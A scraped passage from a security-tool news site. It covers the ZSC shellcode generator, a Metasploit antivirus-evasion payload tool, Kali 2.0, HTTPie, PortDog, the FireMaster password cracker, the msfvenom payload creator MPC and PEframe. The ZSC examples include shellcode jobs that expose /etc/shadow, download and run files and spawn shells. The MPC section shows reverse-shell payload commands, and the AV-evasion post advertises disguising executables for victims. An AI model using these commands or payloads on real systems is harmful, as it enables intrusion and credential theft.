>zsc -os linux_x86 -encode none -job "system('ls')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('ls[space]-la')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('ls[space]-la[space]/etc/shadow;chmod[space]777[space]/etc/shadow;ls[space]-la[space]/etc/shadow;cat[space]/etc/shadow;wget[space]file[space];chmod[space]777[space]file;./file')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('wget[space]file;sh[space]file')" -o file.txt
>zsc -os linux_x86 -encode none -job "chmod('/etc/shadow','777')" -o file.txt
>zsc -os linux_x86 -encode none -job "write('/etc/passwd','user:pass')" -o file.txt
>zsc -os linux_x86 -encode none -job "exec('/bin/bash')" -o file.txt
Note: Don’t use space ‘ ’ in system() function, replace it with “[space]” , software will detect and replace “ ” for you in shellcode.
Note: script_executor(),download_execute(),download(),dir_create(),file_create() are using linux command line , not the function. [wget,mkdir,echo] system() function added in script, you can use it to do anything and generate any command line shellcode.
Note: exec() doesn’t support any ARGV same as exec(‘/bin/bash -c ls’) or exec(‘/bin/bash’,‘-c’,‘ls’), you have to wait for next version and this feature will available in system()
Note: you also can use high value for inc and dec time, like inc_100000, your shellcode may get too big
Note: each time you execute chmod()[or any other] function with random encode, you are gonna get random outputs and different shellcode.
Note: your xor value could be anything. “xor_0x41414141” and “xor_0x45872f4d” are examples.

Wizard Switch

With -wizard switch you are able to generate shellcode without long ARGVs, software will ask you for information.

Note: While you are using -wizard switch, if you push “Enter” without typing anything, the default value will be set on the varible.
Note: With entering “list”, List of values will be shown.

Available Features
  • add length calculator for output
  • add filename writer in gcc commandline in output file
  • fixed bug in encoding module not available.
  • fixed bug in os module not available
  • add “-wizard” switch
  • add installer “use ‘zsc’ commandline in terminal after installed”
  • add uninstaller
  • This Software just could be run on linux since this version
  • change output to .c file and automated shellcode generating
  • add color output for termina
  • add inc encoding chmod() [linux_x86]
  • add inc_timesyouwant chmod() [linux_x86]
  • add dec encoding chmod() [linux_x86]
  • add dec_timesyouwant chmod() [linux_x86]
  • add features table inside “features_table.html”
  • add -about to menu for developers name and etc
  • fixed permission number calculating in chmod() [linux_x86]
  • software’s signature changes
  • bug fix reported by user in executing on linux , color function
  • add xor_random encoding chmod() [linux_x86]
  • add xor_yourvalue encoding chmod() [linux_x86]
  • add add_random encoding chmod() [linux_x86]
  • add add_yourvalue encoding chmod() [linux_x86]
  • add sub_random encoding chmod() [linux_x86]
  • add sub_yourvalue encoding chmod() [linux_x86]
  • fixed shellcode encode type checking
  • [linux_x86 modules completed]
  • add script_executor() [linux - using command execution]
  • add download_execute() [linux_x86 - using command execution (wget)]
  • add download() [linux_x86 - using command execution (wget)]
  • add dir_create() [linux_x86 using command execution]
  • add file_create() [linux_x86 using command execution]
  • add encodes file for next version released
  • add system() [linux_x86 command execute]
  • fixed chmod filename ¼ char length [linux_x86]
  • fixed exec filename ¼ char length [linux_x86]
  • fixed write filename ¼ length [linux_x86]
  • fixed write content ¼ length [linux_x86]
  • fixed write length calculator [linux_x86]
  • and fixed some other bugs in coding [core]
  • system() function added in script, you can use it to do anything and generate any command line shellcode.
  • add chmod() [linux_x86] -> chmod(‘/path/file’,‘perm_num’)
  • add write() [linux_x86] -> write(‘/path/file’,‘content’)
  • add exec() [linux_x86] -> exec(‘/path/file’)
  • add encode [none - all os]
  • add mix_all encoding in chmod() [linux_x86]
  • add xor_random encoding in system() [linux_x86]
  • add xor_yourvalue encoding in system() [linux_x86]
  • add add_random encoding in system() [linux_x86]
  • add add_yourvalue encoding in system() [linux_x86]
  • add sub_random encoding in system() [linux_x86
  • add sub_yourvalue encoding in system() [linux_x86]
  • add inc encoding in system() [linux_x86]
  • add inc_timesyouwant encoding in system() [linux_x86
  • add dec encoding in system() [linux_x86]
  • add dec_timesyouwant encoding in system() [linux_x86]
  • add mix_all encoding in system() [linux_x86]
  • add xor_random encoding in file_create() [linux_x86]
  • add xor_yourvalue encoding in file_create() [linux_x86]
  • add add_random encoding in file_create() [linux_x86]
  • add add_yourvalue encoding in file_create() [linux_x86]
  • add sub_random encoding in file_create() [linux_x86
  • add sub_yourvalue encoding in file_create() [linux_x86]
  • add inc encoding in file_create() [linux_x86]
  • add inc_timesyouwant encoding in file_create() [linux_x86
  • add dec encoding in file_create() [linux_x86]
  • add dec_timesyouwant encoding in file_create() [linux_x86]
  • add mix_all encoding in file_create() [linux_x86]
  • add xor_random encoding in dir_create() [linux_x86]
  • add xor_yourvalue encoding in dir_create() [linux_x86]
  • add add_random encoding in dir_create() [linux_x86]
  • add add_yourvalue encoding in dir_create() [linux_x86]
  • add sub_random encoding in dir_create() [linux_x86
  • add sub_yourvalue encoding in dir_create() [linux_x86]
  • add inc encoding in dir_create() [linux_x86]
  • add inc_timesyouwant encoding in dir_create() [linux_x86
  • add dec encoding in dir_create() [linux_x86]
  • add dec_timesyouwant encoding in dir_create() [linux_x86]
  • add mix_all encoding in dir_create() [linux_x86]
  • add xor_random encoding in download() [linux_x86]
  • add xor_yourvalue encoding in download() [linux_x86]
  • add add_random encoding in download() [linux_x86]
  • add add_yourvalue encoding in download() [linux_x86]
  • add sub_random encoding in download() [linux_x86
  • add sub_yourvalue encoding in download() [linux_x86]
  • add inc encoding in download() [linux_x86]
  • add inc_timesyouwant encoding in download() [linux_x86
  • add dec encoding in download() [linux_x86]
  • add dec_timesyouwant encoding in download() [linux_x86]
  • add mix_all encoding in download() [linux_x86]
  • add xor_random encoding in download_execute() [linux_x86]
  • add xor_yourvalue encoding in download_execute() [linux_x86]
  • add add_random encoding in download_execute() [linux_x86]
  • add add_yourvalue encoding in download_execute() [linux_x86]
  • add sub_random encoding in download_execute() [linux_x86
  • add sub_yourvalue encoding in download_execute() [linux_x86]
  • add inc encoding in download_execute() [linux_x86]
  • add inc_timesyouwant encoding in download_execute() [linux_x86
  • add dec encoding in download_execute() [linux_x86]
  • add dec_timesyouwant encoding in download_execute() [linux_x86]
  • add mix_all encoding in download_execute() [linux_x86]
  • add xor_random encoding in system() [linux_x86]
  • add xor_yourvalue encoding in system() [linux_x86]
  • add add_random encoding in system() [linux_x86]
  • add add_yourvalue encoding in system() [linux_x86]
  • add sub_random encoding in system() [linux_x86
  • add sub_yourvalue encoding in system() [linux_x86]
  • add inc encoding in system() [linux_x86]
  • add inc_timesyouwant encoding in system() [linux_x86
  • add dec encoding in system() [linux_x86]
  • add dec_timesyouwant encoding in system() [linux_x86]
  • add mix_all encoding in system() [linux_x86]
  • add xor_random encoding in script_executor() [linux_x86]
  • add xor_yourvalue encoding in script_executor() [linux_x86]
  • add add_random encoding in script_executor() [linux_x86]
  • add add_yourvalue encoding in script_executor() [linux_x86]
  • add sub_random encoding in script_executor() [linux_x86
  • add sub_yourvalue encoding in script_executor() [linux_x86]
  • add inc encoding in script_executor() [linux_x86]
  • add inc_timesyouwant encoding in script_executor() [linux_x86
  • add dec encoding in script_executor() [linux_x86]
  • add dec_timesyouwant encoding in script_executor() [linux_x86]
  • add mix_all encoding in script_executor() [linux_x86]
  • add add_random encoding in write() [linux_x86]
  • add xor_random encoding in write() [linux_x86]
  • add sub_random encoding in write() [linux_x86]
  • add xor_random encoding in exec() [linux_x86]
  • add sub_random encoding in exec() [linux_x86
  • add add_random encoding in exec() [linux_x86]
  • fixed bug in system() when len(command) is less than 5
  • fixed bug in encode module add_random chmod() [linux_x86] 

DOWNLOAD LINK - WEBSITE

Metasploit AV Evasion - Metasploit Payload Generator that Avoids Most Anti-Virus Products

August 18, 2015, 9:25 am
$
0
0

Metasploit payload generator that avoids most Anti-Virus products.

Installing 
git clone https://github.com/nccgroup/metasploitavevasion.git
chmod +x the avoid.sh file before use.

How To Use 
./avoid.sh
Then follow the on screen prompts.

Features
  • Easily generate a Metasploit executable payload to bypass Anti-Virus detection
  • Local or remote listener generation
  • Disguises the executable file with a PDF icon
  • Executable opens minimised on the victims computer
  • Automatically creates AutoRun files for CDROM exploitation

DOWNLOAD LINK - WEBSITE

Kali Linux 2.0 - The Best Penetration Testing Distribution

August 18, 2015, 9:39 am
$
0
0

So, what’s new in Kali 2.0? There’s a new 4.0 kernel, now based on Debian Jessie, improved hardware and wireless driver coverage, support for a variety of Desktop Environments (gnome, kde, xfce, mate, e17, lxde, i3wm), updated desktop environment and tools – and the list goes on.

Kali Linux is Now a Rolling Distribution

One of the biggest moves we’ve taken to keep Kali 2.0 up-to-date in a global, continuous manner, is transforming Kali into a rolling distribution. What this means is that we are pulling our packages continuously from Debian Testing(after making sure that all packages are installable) – essentially upgrading the Kali core system, while allowing us to take advantage of newer Debian packages as they roll out. This move is where our choice in Debian as a base system really pays off – we get to enjoy the stability of Debian, while still remaining on the cutting edge.

Continuously Updated Tools, Enhanced Workflow

Another interesting development in our infrastructure has been the integration of an upstream version checking system, which alerts us when new upstream versions of tools are released (usually via git tagging). This script runs daily on a select list of common tools and keeps us alerted if a new tool requires updating. With this new system in place, core tool updates will happen more frequently. With the introduction of this new monitoring system, we  will slowly start phasing out the “tool upgrades” option in our bug tracker.

New Flavours of Kali Linux 2.0

Through our Live Build process, Kali 2.0 now natively supports KDE, GNOME3, Xfce, MATE, e17, lxde and i3wm. We’ve moved on to GNOME 3 in this release, marking the end of a long abstinence period. We’ve finally embraced GNOME 3 and with a few custom changes, it’s grown to be our favourite desktop environment. We’ve added custom support for multi-level menus, true terminal transparency, as well as a handful of useful gnome shell extensions. This however has come at a price – the minimum RAM requirements for a full GNOME 3 session has increased to 768 MB. This is a non-issue on modern hardware but can be detrimental on lower-end machines. For this reason, we have also released an official, minimal Kali 2.0 ISO. This “light” flavour of Kali includes a handful of useful tools together with the lightweight Xfce desktop environment – a perfect solution for resource-constrained computers.

Kali Linux 2.0 ARM Images & NetHunter 2.0

The whole ARM image section has been updated across the board with Kali 2.0 – including Raspberry Pi, Chromebooks, Odroids… The whole lot! In the process, we’ve added some new images – such as the latest Chromebook Flip – the little beauty here on the right. Go ahead, click on the image, take a closer look. Another helpful change we’ve implemented in our ARM images is including kernel sources, for easier compilation of new drivers.
We haven’t forgotten about NetHunter, our favourite mobile penetration testing platform – which also got an update and now includes Kali 2.0. With this, we’ve released a whole barrage of new NetHunter images for Nexus 5, 6, 7, 9, and 10. The OnePlus One NetHunter image has also been updated to Kali 2.0 and now has a much awaited image for CM12 as well – check the Offensive Security NetHunter page for more information.

Updated VMware and VirtualBox Images

Offensive Security, the information security training and penetration testing company behind Kali Linux, has put up new VMware and VirtualBox Kali 2.0 images for those who want to try Kali in a virtual environment. These include 32 and 64 bit flavours of the GNOME 3 full Kali environment.
If you want to build your own virtual environment, you can consult our documentation site on how to install the variousvirtual guest tools for a smoother experience.

How Do I Upgrade to Kali 2.0?
Yes, you can upgrade Kali 1.x to Kali 2.0! To do this, you will need to edit your source.list entries, and run a dist-upgrade as shown below. If you have been using incorrect or extraneous Kali repositories or otherwise manually installed or overwritten Kali packages outside of apt, your upgrade to Kali 2.0 may fail. This includes scripts like lazykali.sh, PTF, manual git clones in incorrect directories, etc. – All of these will clobber existing files on the filesystem and result in a failed upgrade. If this is the case for you, you’re better off reinstalling your OS from scratch.
Otherwise, feel free to:

cat << EOF > /etc/apt/sources.list
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security/ sana/updates main contrib non-free
EOF

apt-get update
apt-get dist-upgrade # get a coffee, or 10.
reboot


DOWNLOAD LINK - WEBSITE

HTTPie - a CLI, cURL - Like Tool For Humans

August 18, 2015, 9:43 am
$
0
0

HTTPie (pronounced aych-tee-tee-pie) is a command line HTTP client. Its goal is to make CLI interaction with web services as human-friendly as possible. It provides a simple http command that allows for sending arbitrary HTTP requests using a simple and natural syntax, and displays colorized output. HTTPie can be used for testing, debugging, and generally interacting with HTTP servers.

HTTPie is written in Python, and under the hood it uses the excellent Requests and Pygments libraries.

Main Features
  • Expressive and intuitive syntax
  • Formatted and colorized terminal output
  • Built-in JSON support
  • Forms and file uploads
  • HTTPS, proxies, and authentication
  • Arbitrary request data
  • Custom headers
  • Persistent sessions
  • Wget-like downloads
  • Python 2.6, 2.7 and 3.x support
  • Linux, Mac OS X and Windows support
  • Plugins
  • Documentation
  • Test coverage

Installation

On Mac OS X, HTTPie can be installed via Homebrew:
$ brew install httpie
Most Linux distributions provide a package that can be installed using the system package manager, e.g.:
# Debian-based distributions such as Ubuntu:
$ apt-get install httpie

# RPM-based distributions:
$ yum install httpie
universal installation method (that works on Windows, Mac OS X, Linux, …, and provides the latest version) is to use pip:
# Make sure we have an up-to-date version of pip and setuptools:
$ pip install --upgrade pip setuptools

$ pip install --upgrade httpie
(If pip installation fails for some reason, you can try easy_install httpie as a fallback.)

Development version
The latest development version can be installed directly from GitHub:
# Mac OS X via Homebrew
$ brew install httpie --HEAD

# Universal
$ pip install --upgrade https://github.com/jkbrzt/httpie/tarball/master

Usage

Hello World:
$ http httpie.org
Synopsis:
$ http [flags] [METHOD] URL [ITEM [ITEM]]
See also http --help.

Examples
Custom HTTP methodHTTP headers and JSON data:
$ http PUT example.org X-API-Token:123 name=John
Submitting forms:
$ http -f POST example.org hello=World
See the request that is being sent using one of the output options:
$ http -v example.org
Use Github API to post a comment on an issue with authentication:
$ http -a USERNAME POST https://api.github.com/repos/jkbrzt/httpie/issues/83/comments body='HTTPie is awesome!'
Upload a file using redirected input:
$ http example.org < file.json
Download a file and save it via redirected output:
$ http example.org/file > file
Download a file wget style:
$ http --download example.org/file
Use named sessions to make certain aspects or the communication persistent between requests to the same host:
$ http --session=logged-in -a username:password httpbin.org/get API-Key:123$ http --session=logged-in httpbin.org/headers
Set a custom Host header to work around missing DNS records:
$ http localhost:8000 Host:example.com
What follows is a detailed documentation. It covers the command syntax, advanced usage, and also features additional examples.

HTTP Method

The name of the HTTP method comes right before the URL argument:
$ http DELETE example.org/todos/7
Which looks similar to the actual Request-Line that is sent:
DELETE /todos/7 HTTP/1.1
When the METHOD argument is omitted from the command, HTTPie defaults to either GET (with no request data) or POST(with request data).

Request URL

The only information HTTPie needs to perform a request is a URL. The default scheme is, somewhat unsurprisingly,http://, and can be omitted from the argument – http example.org works just fine.
Additionally, curl-like shorthand for localhost is supported. This means that, for example :3000 would expand tohttp://localhost:3000 If the port is omitted, then port 80 is assumed.
$ http :/foo
GET /foo HTTP/1.1
Host: localhost
$ http :3000/bar
GET /bar HTTP/1.1
Host: localhost:3000
$ http :
GET / HTTP/1.1
Host: localhost
If you find yourself manually constructing URLs with querystring parameters on the terminal, you may appreciate theparam==value syntax for appending URL parameters so that you don't have to worry about escaping the & separators. To search for HTTPie on Google Images you could use this command:
$ http GET www.google.com search==HTTPie tbm==isch
GET /?search=HTTPie&tbm=isch HTTP/1.1



DOWNLOAD LINK - WEBSITE


PortDog - Simple Python Script to Detect Port Scanning Techniques

August 18, 2015, 9:45 am
$
0
0

PortDog is a network anomaly detector aimed to detect port scanning techniques. It is entirely written in python and has easy-to-use interface. It was tested on Ubuntu 15. Please note that, it is not working on Windows OS due to suffering from capturing RAW packets.I am working on to write this script to work both platforms. In future , I'am thinking about adding firewall options that could block malicious attempts. It is using Raw packets for analysis. For this reason, please ensure that you have run this script from privileged session.

Usage:
sudo python portdog.py -t time_for_sniff_in_minutes
For example, if you want to detect for 5 minutes use:
sudo python portdog.py -t 5
For infinite detection use:
sudo python portdog.py -t 0

If you want to get list of scanned ports , press CTRL+C to get port list at runtime (If scan was happened).

DOWNLOAD LINK - WEBSITE

FireMaster - The Firefox Master Password Cracking Tool

August 18, 2015, 9:51 am
$
0
0

FireMaster is the First ever tool to recover the lost Master Password of Firefox.

Master password is used by Firefox to protect the stored loign/password information for all visited websites. If the master password is forgotten, then there is no way to recover the master password and user will lose all the passwords stored in it.

However you can now use FireMaster to recover the forgotten master password and get back all the stored Login/Passwords.

FireMaster supports DictionaryHybrid, Brute-force and advanced Pattern based Brute-force password cracking techniques to recover from simple to complex password. Advanced pattern based password recovery mechanism reduces cracking time significantly especially when the password is complex.

FireMaster is successfully tested with all versions of Firefox starting from 1.0 to latest version v13.0.1.

It works on wide range of platforms starting from Windows XP to Windows 8.

Firefox Password Manager and Master Password

Firefox comes with built-in password manager tool which remembers username and passwords for all the websites you visit. This login/password information is stored in the encrypted form in Firefox database files residing in user's profile directory. 
However any body can just launch the password manager from the Firefox browser and view the credentials. Also one can just copy these database files to different machine and view it offline using the tools such as FirePassword.

Hence to protect from such threats, Firefox uses master password to provide enhanced security. By default Firefox does not set the master password. However once you have set the master password, you need to provide it every time to view login credentials. So if you lose the master password then that means you have lost all the stored passwords as well.

So far there was no way to recover these credentials once you have lost the master password. Now the FireMaster can help you to recover the master password and get back all the sign-on information.

Internals of FireMaster

Once you have lost master password, there is no way to recover it as it is not stored at all. 
Whenever user enters the master password, Firefox uses it to decrypt the encrypted data associated with the known string. If the decrypted data matches this known string then the entered password is correct. FireMaster uses the similar technique to check for the master password, but in more optimized way. 
The entire operation goes like this.
  • FireMaster generates passwords on the fly through various methods.
  • Then it computes the hash of the password using known algorithm.
  • Next this password hash is used to decrypt the encrypted data for known plain text (i.e. "password-check").
  • Now if the decrypted string matches with the known plain text (i.e. "password-check") then the generated password is the master password.

Firefox stores the details about encrypted string, salt, algorithm and version information in key database file key3.db in the user's profile directory. You can just copy this key3.db file to different directory and specify the corresponding path to FireMaster. You can also copy this key3.db to any other high end machine for faster recovery operation.

FireMaster supports following password recovery methods

1) Dictionary Cracking Method
In this mode, FireMaster uses dictionary file having each word on separate line to perform the operation. You can find lot of online dictionary with different sizes and pass it on to Firemaster. This method is more quicker and can find out common passwords.

2) Hybrid Cracking Method
This is advanced dictionary method, in which each word in the dictionary file is prefixed or suffixed with generated word from known character list. This can find out password like pass123, 12test, test34 etc. From the specified character list (such as 123), all combinations of strings are generated and appended or prefixed to the dictionary word based on user settings.

3) Brute-force Cracking Method
In this method, all possible combinations of words from given character list is generated and then subjected to cracking process. This may take long time depending upon the number of characters and position count specified. 

4) Pattern based Brute-force Cracking Method
Pattern based cracking method significantly reduces the password recovery time especially when password is complex. This method can be used when you know the exact password length and remember few characters.

How to use FireMaster?

First you need to copy the key3.db file to temporary directory. Later you have to specify this directory path for FireMaster as a last argument.

Here is the general usage information

Firemaster [-q]
           [-d -f ]
           [-h -f  -n  -g "charlist" [ -s | -p ] ]
           [-b -m  -l  -c "charlist" -p "pattern" ]


Note: With v5.0 onwards, you can specify 'auto' (without quotes) in place of "" to automatically detect default profile path.

Dictionary Crack Options:
   -d  Perform dictionary crack
   -f  Dictionary file with words on each line

Hybrid Crack Options:
   -h  Perform hybrid crack operation using dictionary passwords.
Hybrid crack can find passwords like pass123, 123pass etc
   -f  Dictionary file with words on each line
   -g  Group of characters used for generating the strings
   -n  Maximum length of strings to be generated using above character list
These strings are added to the dictionary word to form the password
   -s  Suffix the generated characters to the dictionary word(pass123)
   -p  Prefix the generated characters to the dictionary word(123pass)

Brute Force Crack Options:
   -b  Perform brute force crack
   -c  Character list used for brute force cracking process
   -m  [Optional] Specify the minimum length of password
   -l  Specify the maximum length of password
   -p   [Optional] Specify the pattern for the password

Examples of FireMaster
// Dictionary Crack
FireMaster.exe -d -f c:\dictfile.txt auto

// Hybrid Crack
FireMaster.exe -h -f c:\dictfile.txt -n 3 -g "123" -s auto

 // Brute-force Crack
FireMaster.exe -q -b -m 3 -l 10 -c "abcdetps123""c:\my test\firefox"

 // Brute-force Crack with Pattern
FireMaster.exe -q -b -m 3 -c "abyz126" -l 10 -p "pa??f??123" auto









Search

MPC - Msfvenom Payload Creator

August 18, 2015, 9:54 am
$
0
0

Msfvenom Payload Creator (MPC) is a wrapper to generate multiple types of payloads, based on users choice. The idea is to be as simple as possible (only requiring one input) to produce their payload.

Fully automating msfvenom & Metasploit is the end goal (well as to be be able to automate MPC itself). The rest is to make the user's life as easy as possible (e.g. IP selection menumsfconsole resource file/commandsbatch payload production and able to enter any argument in any order (in various formats/patterns)).

The only necessary input from the user should be defining the payload they want by either the platform (e.g.windows), or the file extension they wish the payload to have (e.g. exe).
  • Can't remember your IP for a interface? Don't sweat it, just use the interface nameeth0.
  • Don't know what your external IP is? MPC will discover itwan.
  • Want to generate one of each payload? No issue! Try: loop.
  • Want to mass create payloads? Everything? Or to filter your select? ..Either way, its not a problem. Try:batch (for everything), batch msf (for every Meterpreter option), batch staged (for every staged payload), or batch cmd stageless (for every stageless command prompt)!
Note: This will not try to bypass any anti-virus solutions.

Install
  • Designed for Kali Linux v1.1.0a+ & Metasploit v4.11+ (nothing else has been tested).
curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/mpc.sh"> /usr/bin/mpc
chmod +x /usr/bin/mpc
mpc

Help
root@kali:~# mpc -h -v
 [*] Msfvenom Payload Creator (MPC v1.3)

 [i] /usr/bin/mpc <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)
 [i]   Example: /usr/bin/mpc windows 192.168.1.10        # Windows & manual IP.
 [i]            /usr/bin/mpc elf eth0 4444               # Linux, eth0's IP & manual port.
 [i]            /usr/bin/mpc stageless cmd py verbose    # Python, stageless command prompt.
 [i]            /usr/bin/mpc loop eth1                   # A payload for every type, using eth1's IP.
 [i]            /usr/bin/mpc msf batch wan               # All possible Meterpreter payloads, using WAN IP.
 [i]            /usr/bin/mpc help verbose                # This help screen, with even more information.

 [i] <TYPE>:
 [i]   + ASP
 [i]   + ASPX
 [i]   + Bash [.sh]
 [i]   + Java [.jsp]
 [i]   + Linux [.elf]
 [i]   + OSX [.macho]
 [i]   + Perl [.pl]
 [i]   + PHP
 [i]   + Powershell [.ps1]
 [i]   + Python [.py]
 [i]   + Tomcat [.war]
 [i]   + Windows [.exe]

 [i] Rather than putting <DOMAIN/IP>, you can do a interface and MPC will detect that IP address.
 [i] Missing <DOMAIN/IP> will default to the IP menu.

 [i] Missing <PORT> will default to 443.

 [i] <CMD> is a standard/native command prompt/terminal to interactive with.
 [i] <MSF> is a custom cross platform Meterpreter shell, gaining the full power of Metasploit.
 [i] Missing <CMD/MSF> will default to <MSF> where possible.
 [i]   Note: Metasploit doesn't (yet!) support <CMD/MSF> for every <TYPE> format.
 [i] <CMD> payloads are generally smaller than <MSF> and easier to bypass EMET. Limit Metasploit post modules/scripts support.
 [i] <MSF> payloads are generally much larger than <CMD>, as it comes with more features.

 [i] <BIND> opens a port on the target side, and the attacker connects to them. Commonly blocked with ingress firewalls rules on the target.
 [i] <REVERSE> makes the target connect back to the attacker. The attacker needs an open port. Blocked with engress firewalls rules on the target.
 [i] Missing <BIND/REVERSE> will default to <REVERSE>.
 [i] <BIND> allows for the attacker to connect whenever they wish. <REVERSE> needs to the target to be repeatedly connecting back to permanent maintain access.

 [i] <STAGED> splits the payload into parts, making it smaller but dependent on Metasploit.
 [i] <STAGELESS> is the complete standalone payload. More 'stable' than <STAGED>.
 [i] Missing <STAGED/STAGELESS> will default to <STAGED> where possible.
 [i]   Note: Metasploit doesn't (yet!) support <STAGED/STAGELESS> for every <TYPE> format.
 [i] <STAGED> are 'better' in low-bandwidth/high-latency environments.
 [i] <STAGELESS> are seen as 'stealthier' when bypassing Anti-Virus protections. <STAGED> may work 'better' with IDS/IPS.
 [i] More information: https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads
 [i]                   https://www.offensive-security.com/metasploit-unleashed/payload-types/
 [i]                   https://www.offensive-security.com/metasploit-unleashed/payloads/

 [i] <TCP> is the standard method to connecting back. This is the most compatible with TYPES as its RAW. Can be easily detected on IDSs.
 [i] <HTTP> makes the communication appear to be HTTP traffic (unencrypted). Helpful for packet inspection, which limit port access on protocol - e.g. TCP 80.
 [i] <HTTPS> makes the communication appear to be (encrypted) HTTP traffic using as SSL. Helpful for packet inspection, which limit port access on protocol - e.g. TCP 443.
 [i] <FIND_PORT> will attempt every port on the target machine, to find a way out. Useful with stick ingress/engress firewall rules. Will switch to 'allports' based on <TYPE>.
 [i] Missing <TCP/HTTP/HTTPS/FIND_PORT> will default to <TCP>.
 [i] By altering the traffic, such as <HTTP> and even more <HTTPS>, it will slow down the communication & increase the payload size.
 [i] More information: https://community.rapid7.com/community/metasploit/blog/2011/06/29/meterpreter-httphttps-communication

 [i] <BATCH> will generate as many combinations as possible: <TYPE>, <CMD + MSF>, <BIND + REVERSE>, <STAGED + STAGLESS> & <TCP + HTTP + HTTPS + FIND_PORT>
 [i] <LOOP> will just create one of each <TYPE>.

 [i] <VERBOSE> will display more information.
root@kali:~#

Example #1 (Windows, Fully Automated With IP)
root@kali:~# mpc windows 192.168.1.10
 [*] Msfvenom Payload Creator (MPC v1.3)
 [i]   IP: 192.168.1.10
 [i] PORT: 443
 [i] TYPE: windows (windows/meterpreter/reverse_tcp)
 [i]  CMD: msfvenom -p windows/meterpreter/reverse_tcp -f exe --platform windows -a x86 -e generic/none LHOST=192.168.1.10 LPORT=443 > /root/windows-meterpreter-staged-reverse-tcp-443.exe
 [i] File (/root/windows-meterpreter-staged-reverse-tcp-443.exe) already exists. Overwriting...
 [i] windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-443.exe'
 [i] MSF handler file: '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'   (msfconsole -q -r /root/windows-meterpreter-staged-reverse-tcp-443-exe.rc)
 [?] Quick web server for file transfer?   python -m SimpleHTTPServer 8080
 [*] Done!
root@kali:~#

Example #2 (Linux Format, Fully Automated With Interface and Port)
root@kali:~# ./mpc elf eth0 4444
 [*] Msfvenom Payload Creator (MPC v1.3)
 [i]   IP: 192.168.103.238
 [i] PORT: 4444
 [i] TYPE: linux (linux/x86/shell/reverse_tcp)
 [i]  CMD: msfvenom -p linux/x86/shell/reverse_tcp -f elf --platform linux -a x86 -e generic/none LHOST=192.168.103.238 LPORT=4444 > /root/linux-shell-staged-reverse-tcp-4444.elf
 [i] linux shell created: '/root/linux-shell-staged-reverse-tcp-4444.elf'
 [i] MSF handler file: '/root/linux-shell-staged-reverse-tcp-4444-elf.rc'   (msfconsole -q -r /root/linux-shell-staged-reverse-tcp-4444-elf.rc)
 [?] Quick web server for file transfer?   python -m SimpleHTTPServer 8080
 [*] Done!
root@kali:~#

Example #3 (Python Format, Stageless Command Prompt Using Interactive IP Menu)
root@kali:~# mpc stageless cmd py verbose
 [*] Msfvenom Payload Creator (MPC v1.3)

 [i] Use which interface/IP address?:
 [i]   1.) eth0 - 192.168.103.238
 [i]   2.) eth1 - 192.168.155.175
 [i]   3.) tap0 - 10.10.100.63
 [i]   4.) lo - 127.0.0.1
 [i]   5.) wan - xx.xx.xx.xx
 [?] Select 1-5, interface or IP address: 3

 [i]        IP: 10.10.100.63
 [i]      PORT: 443
 [i]      TYPE: python (python/shell_reverse_tcp)
 [i]     SHELL: shell
 [i] DIRECTION: reverse
 [i]     STAGE: stageless
 [i]    METHOD: tcp
 [i]       CMD: msfvenom -p python/shell_reverse_tcp -f raw --platform python -e generic/none -a python LHOST=10.10.100.63 LPORT=443 > /root/python-shell-stageless-reverse-tcp-443.py
 [i] python shell created: '/root/python-shell-stageless-reverse-tcp-443.py'
 [i] File: ASCII text, with very long lines, with no line terminators
 [i] Size: 4.0K
 [i]  MD5: 53452eafafe21bff94e6c4621525165b
 [i] SHA1: 18641444f084c5fe7e198c29bf705a68b15c2cc9
 [i] MSF handler file: '/root/python-shell-stageless-reverse-tcp-443-py.rc'   (msfconsole -q -r /root/python-shell-stageless-reverse-tcp-443-py.rc)
 [?] Quick web server for file transfer?   python -m SimpleHTTPServer 8080
 [*] Done!
root@kali:~#

To-Do List
  • Shellcode generation
  • x64 payloads
  • IPv6 support
  • Look into using OS scripting more (powershell_bind_tcp & bind_perl etc)

DOWNLOAD LINK - WEBSITE

PEframe - Tool to Perform Static Analysis on Portable Executable Malware

August 18, 2015, 9:59 am
$
0
0
PEframe is a open source tool to perform static analysis on Portable Executable malware.

Usage
$ peframe malware.exe
$ peframe [--option] malware.exe

Options
--json         Output in json

--import       Imported function and dll
--export       Exported function and dll

--dir-import   Import directory
--dir-export   Export directory
--dir-resource Resource directory
--dir-debug    Debug directory
--dir-tls      TLS directory

--strings      Get all strings
--sections     Sections information
--dump         Dump all information

Install
Prerequisites
Python 2.6.5 -> 2.7.x
Install
from pypi
# pip install https://github.com/guelfoweb/peframe/archive/master.zip
from git
$ git clone https://github.com/guelfoweb/peframe.git

$ cd peframe

# python setup.py install

Example
$ peframe malware.exe

Short information
------------------------------------------------------------
File Name          malware.exe
File Size          935281 byte
Compile Time       2012-01-29 22:32:28
DLL                False
Sections           4
Hash MD5           cae18bdb8e9ef082816615e033d2d85b
Hash SAH1          546060ad10a766e0ecce1feb613766a340e875c0
Imphash            353cf96592db561b5ab4e408464ac6ae
Detected           Xor, Sign, Packer, Anti Debug, Anti VM
Directory          Import, Resource, Debug, Relocation, Security

XOR discovered
------------------------------------------------------------
Key length         Offset (hex)       Offset (dec)
1                  0x5df4e            384846
2                  0x5df4e            384846
4                  0x5df4e            384846
8                  0x5df4e            384846

Digital Signature
------------------------------------------------------------
Virtual Address    12A200
Block Size         4813 byte
Hash MD5           63b8c4daec26c6c074ca5977f067c21e
Hash SHA-1         53731a283d0c251f7c06f6d7d423124689873c62

Packer matched [4]
------------------------------------------------------------
Packer             Microsoft Visual C++ v6.0
Packer             Microsoft Visual C++ 5.0
Packer             Microsoft Visual C++
Packer             Installer VISE Custom

Anti Debug discovered [9]
------------------------------------------------------------
Anti Debug         FindWindowExW
Anti Debug         FindWindowW
Anti Debug         GetWindowThreadProcessId
Anti Debug         IsDebuggerPresent
Anti Debug         OutputDebugStringW
Anti Debug         Process32FirstW
Anti Debug         Process32NextW
